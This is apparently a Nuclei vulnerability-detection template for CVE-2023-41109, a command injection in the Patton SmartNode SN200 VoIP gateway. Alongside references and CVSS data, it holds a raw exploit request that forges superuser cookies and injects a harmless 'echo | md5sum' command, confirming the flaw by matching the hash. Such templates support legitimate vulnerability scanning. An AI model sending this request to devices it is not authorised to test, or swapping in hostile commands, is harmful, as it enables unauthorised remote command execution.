50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2023-41109
|
|
|
|
info:
|
|
name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
|
|
author: princechaddha
|
|
severity: critical
|
|
description: |
|
|
The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
|
|
remediation: |
|
|
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
|
|
reference: |-
|
|
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41109
|
|
- http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
|
|
- http://seclists.org/fulldisclosure/2023/Nov/12
|
|
- https://www.syss.de/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-41109
|
|
cwe-id: CWE-78
|
|
epss-score: 0.23094
|
|
epss-percentile: 0.96433
|
|
cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: patton
|
|
product: smartnode_sn200_firmware
|
|
tags: cve,cve2023,smartnode,voip,patton
|
|
variables:
|
|
payload: "echo CVE-2023-41109 | md5sum"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: AuthToken=; AuthGroup=superuser; UserName=admin
|
|
|
|
{"cmd":"{{payload}}","arguments":[]}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "dd556350275e2ee0a2e877cea9c8a74a"
|
|
# digest: 4a0a0047304502202bfc9da42e19e2e2ee3b4774db0a0deed67a87e5115c8868e175566429724498022100ef5913fc5f59bb9dbf437ebb76d6ec44d1e3fff82794bf190909f9e6acd3ec98:922c64590222798bb761d5b6d8e72950 |